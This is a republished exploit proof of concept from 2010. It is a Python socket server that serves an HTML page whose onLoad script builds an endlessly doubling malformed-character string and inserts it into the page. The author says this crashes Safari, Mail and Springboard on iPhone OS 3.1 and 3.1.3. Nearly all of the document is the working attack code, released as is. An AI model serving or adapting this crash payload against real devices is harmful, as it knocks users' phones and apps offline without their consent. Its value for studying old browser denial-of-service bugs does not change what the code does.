iPhone Springboard Malformed Character Crash PoC
Source: vfocus.net  Author: Chase  Published: 2010-03-16

#!/usr/bin/python

# iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
# This script acts as a web server and causes Safari, as well as Mail and Springboard, to crash.
# All these apps crash after running this exploit on the iPhone. Unable to debug any of these processes, as the gdb on my
# device is acting up; the original iPhone is just too low on memory to further test this exploit, so I am releasing it.

# Exploit Title: iPhone Springboard Malformed Character Crash PoC
# Date: 3/15/2010
# Author: Chase Higgins
# Software Link: apple.com/iphone/
# Version: iPhone 2G, iPhone 3GS
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
# CVE :
# Code : none

import sys, socket;

def main():
 html = """
 <html>
 <head>
 <script>
 function triggerCrash(){
  evil_div = document.getElementById('evilDiv');
  var evil_string = "\x4e\x5b\x01";
  i = 0;

  while (i < 1000){
   evil_string = evil_string + evil_string;
  }

  evil_div.innerHTML = evil_string;
 }
 </script>
 </head>
 <body onLoad="triggerCrash()">
 <div id="evilDiv">
 
 </div>
 </body>
 </html>
 """;

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
 s.bind(('',2121));
 s.listen(1);
 
 while True:
  channel, details = s.accept();
  print channel.recv(1024);
  channel.send(html);
  channel.close();
 
main();


 